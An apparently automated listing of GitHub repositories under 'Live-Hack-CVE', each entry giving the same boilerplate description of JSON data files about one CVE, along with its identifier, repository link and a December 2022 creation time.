**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20313 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20313](https://github.com/Live-Hack-CVE/CVE-2021-20313) create time: 2022-12-24T10:26:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20999 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20999](https://github.com/Live-Hack-CVE/CVE-2021-20999) create time: 2022-12-24T10:26:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20201](https://github.com/Live-Hack-CVE/CVE-2021-20201) create time: 2022-12-24T10:26:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21083 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21083](https://github.com/Live-Hack-CVE/CVE-2021-21083) create time: 2022-12-24T10:26:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20264](https://github.com/Live-Hack-CVE/CVE-2021-20264) create time: 2022-12-24T10:26:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20050](https://github.com/Live-Hack-CVE/CVE-2021-20050) create time: 2022-12-24T10:26:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20187 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20187](https://github.com/Live-Hack-CVE/CVE-2021-20187) create time: 2022-12-24T10:26:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20185](https://github.com/Live-Hack-CVE/CVE-2021-20185) create time: 2022-12-24T10:25:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21026](https://github.com/Live-Hack-CVE/CVE-2021-21026) create time: 2022-12-24T10:25:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21045](https://github.com/Live-Hack-CVE/CVE-2021-21045) create time: 2022-12-24T10:25:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21020](https://github.com/Live-Hack-CVE/CVE-2021-21020) create time: 2022-12-24T10:25:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20222](https://github.com/Live-Hack-CVE/CVE-2021-20222) create time: 2022-12-24T10:25:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21096 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21096](https://github.com/Live-Hack-CVE/CVE-2021-21096) create time: 2022-12-24T10:25:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43184 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43184](https://github.com/Live-Hack-CVE/CVE-2022-43184) create time: 2022-12-24T11:10:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22224](https://github.com/Live-Hack-CVE/CVE-2022-22224) create time: 2022-12-24T11:10:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43185 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43185](https://github.com/Live-Hack-CVE/CVE-2022-43185) create time: 2022-12-24T11:10:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22201 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22201](https://github.com/Live-Hack-CVE/CVE-2022-22201) create time: 2022-12-24T11:10:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41707 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41707](https://github.com/Live-Hack-CVE/CVE-2022-41707) create time: 2022-12-24T11:10:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41709](https://github.com/Live-Hack-CVE/CVE-2022-41709) create time: 2022-12-24T11:09:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22208](https://github.com/Live-Hack-CVE/CVE-2022-22208) create time: 2022-12-24T11:09:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22220](https://github.com/Live-Hack-CVE/CVE-2022-22220) create time: 2022-12-24T11:09:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43045 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43045](https://github.com/Live-Hack-CVE/CVE-2022-43045) create time: 2022-12-24T11:09:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43039 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43039](https://github.com/Live-Hack-CVE/CVE-2022-43039) create time: 2022-12-24T11:09:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43044](https://github.com/Live-Hack-CVE/CVE-2022-43044) create time: 2022-12-24T11:09:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43043 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43043](https://github.com/Live-Hack-CVE/CVE-2022-43043) create time: 2022-12-24T11:09:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43042 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43042](https://github.com/Live-Hack-CVE/CVE-2022-43042) create time: 2022-12-24T11:09:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43040 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43040](https://github.com/Live-Hack-CVE/CVE-2022-43040) create time: 2022-12-24T11:09:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25736 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25736](https://github.com/Live-Hack-CVE/CVE-2022-25736) create time: 2022-12-24T11:09:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25748 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25748](https://github.com/Live-Hack-CVE/CVE-2022-25748) create time: 2022-12-24T11:09:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25749 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25749](https://github.com/Live-Hack-CVE/CVE-2022-25749) create time: 2022-12-24T11:09:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25750 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25750](https://github.com/Live-Hack-CVE/CVE-2022-25750) create time: 2022-12-24T11:09:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25664](https://github.com/Live-Hack-CVE/CVE-2022-25664) create time: 2022-12-24T11:09:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25665 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25665](https://github.com/Live-Hack-CVE/CVE-2022-25665) create time: 2022-12-24T11:09:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-25723 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-25723](https://github.com/Live-Hack-CVE/CVE-2022-25723) create time: 2022-12-24T11:09:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32035](https://github.com/Live-Hack-CVE/CVE-2022-32035) create time: 2022-12-24T11:09:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32034](https://github.com/Live-Hack-CVE/CVE-2022-32034) create time: 2022-12-24T11:09:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32033 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32033](https://github.com/Live-Hack-CVE/CVE-2022-32033) create time: 2022-12-24T11:08:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43414](https://github.com/Live-Hack-CVE/CVE-2022-43414) create time: 2022-12-24T11:08:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43415 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43415](https://github.com/Live-Hack-CVE/CVE-2022-43415) create time: 2022-12-24T11:08:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43416 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43416](https://github.com/Live-Hack-CVE/CVE-2022-43416) create time: 2022-12-24T11:08:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43417 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43417](https://github.com/Live-Hack-CVE/CVE-2022-43417) create time: 2022-12-24T11:08:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43418 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43418](https://github.com/Live-Hack-CVE/CVE-2022-43418) create time: 2022-12-24T11:08:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43419](https://github.com/Live-Hack-CVE/CVE-2022-43419) create time: 2022-12-24T11:08:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-5536 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-5536](https://github.com/Live-Hack-CVE/CVE-2007-5536) create time: 2022-12-24T09:45:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-0132 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-0132](https://github.com/Live-Hack-CVE/CVE-2008-0132) create time: 2022-12-24T10:20:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5355 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5355](https://github.com/Live-Hack-CVE/CVE-2020-5355) create time: 2022-12-24T09:47:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-23648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-23648](https://github.com/Live-Hack-CVE/CVE-2020-23648) create time: 2022-12-24T09:46:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34744](https://github.com/Live-Hack-CVE/CVE-2021-34744) create time: 2022-12-24T09:48:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3482 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3482](https://github.com/Live-Hack-CVE/CVE-2021-3482) create time: 2022-12-24T09:48:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3498 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3498](https://github.com/Live-Hack-CVE/CVE-2021-3498) create time: 2022-12-24T09:48:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36032](https://github.com/Live-Hack-CVE/CVE-2021-36032) create time: 2022-12-24T09:48:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36022](https://github.com/Live-Hack-CVE/CVE-2021-36022) create time: 2022-12-24T09:48:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36046 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36046](https://github.com/Live-Hack-CVE/CVE-2021-36046) create time: 2022-12-24T09:48:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36049](https://github.com/Live-Hack-CVE/CVE-2021-36049) create time: 2022-12-24T09:47:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36052 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36052](https://github.com/Live-Hack-CVE/CVE-2021-36052) create time: 2022-12-24T09:47:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36070 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36070](https://github.com/Live-Hack-CVE/CVE-2021-36070) create time: 2022-12-24T09:47:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34771](https://github.com/Live-Hack-CVE/CVE-2021-34771) create time: 2022-12-24T09:47:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34725 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34725](https://github.com/Live-Hack-CVE/CVE-2021-34725) create time: 2022-12-24T09:47:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-42553 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-42553](https://github.com/Live-Hack-CVE/CVE-2021-42553) create time: 2022-12-24T09:47:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24779 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24779](https://github.com/Live-Hack-CVE/CVE-2021-24779) create time: 2022-12-24T09:46:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34595 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34595](https://github.com/Live-Hack-CVE/CVE-2021-34595) create time: 2022-12-24T09:46:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41158 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41158](https://github.com/Live-Hack-CVE/CVE-2021-41158) create time: 2022-12-24T09:46:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21689 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21689](https://github.com/Live-Hack-CVE/CVE-2021-21689) create time: 2022-12-24T09:46:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40113 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40113](https://github.com/Live-Hack-CVE/CVE-2021-40113) create time: 2022-12-24T09:46:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21695](https://github.com/Live-Hack-CVE/CVE-2021-21695) create time: 2022-12-24T09:46:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41253](https://github.com/Live-Hack-CVE/CVE-2021-41253) create time: 2022-12-24T09:46:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26338 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26338](https://github.com/Live-Hack-CVE/CVE-2021-26338) create time: 2022-12-24T09:45:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36322](https://github.com/Live-Hack-CVE/CVE-2021-36322) create time: 2022-12-24T09:45:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24703](https://github.com/Live-Hack-CVE/CVE-2021-24703) create time: 2022-12-24T09:45:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24842 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24842](https://github.com/Live-Hack-CVE/CVE-2021-24842) create time: 2022-12-24T09:45:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24914 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24914](https://github.com/Live-Hack-CVE/CVE-2021-24914) create time: 2022-12-24T09:45:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21957 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21957](https://github.com/Live-Hack-CVE/CVE-2021-21957) create time: 2022-12-24T09:45:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24790 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24790](https://github.com/Live-Hack-CVE/CVE-2021-24790) create time: 2022-12-24T09:45:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3621 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3621](https://github.com/Live-Hack-CVE/CVE-2021-3621) create time: 2022-12-24T09:45:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-24988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-24988](https://github.com/Live-Hack-CVE/CVE-2021-24988) create time: 2022-12-24T09:45:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-28500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-28500](https://github.com/Live-Hack-CVE/CVE-2021-28500) create time: 2022-12-24T09:45:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-34402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-34402](https://github.com/Live-Hack-CVE/CVE-2021-34402) create time: 2022-12-24T09:45:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43406 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43406](https://github.com/Live-Hack-CVE/CVE-2022-43406) create time: 2022-12-24T09:48:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38104](https://github.com/Live-Hack-CVE/CVE-2022-38104) create time: 2022-12-24T09:47:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3630](https://github.com/Live-Hack-CVE/CVE-2022-3630) create time: 2022-12-24T09:47:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34439 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34439](https://github.com/Live-Hack-CVE/CVE-2022-34439) create time: 2022-12-24T09:47:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26870 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26870](https://github.com/Live-Hack-CVE/CVE-2022-26870) create time: 2022-12-24T09:47:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31239](https://github.com/Live-Hack-CVE/CVE-2022-31239) create time: 2022-12-24T09:47:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34438 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34438](https://github.com/Live-Hack-CVE/CVE-2022-34438) create time: 2022-12-24T09:47:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34437](https://github.com/Live-Hack-CVE/CVE-2022-34437) create time: 2022-12-24T09:47:19Z

